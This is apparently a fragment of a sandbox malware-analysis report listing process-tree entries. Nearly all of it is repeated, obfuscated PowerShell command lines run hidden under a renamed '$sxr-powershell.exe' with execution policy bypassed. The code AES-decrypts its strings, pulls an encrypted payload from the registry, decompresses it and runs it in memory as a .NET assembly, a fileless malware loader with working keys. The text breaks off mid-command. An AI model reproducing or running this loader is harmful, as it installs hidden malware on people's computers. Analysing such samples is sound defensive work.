'')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        
        PID:6668
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        
        PID:8500
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        Hide Artifacts: Hidden Window
        
        PID:8796
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = 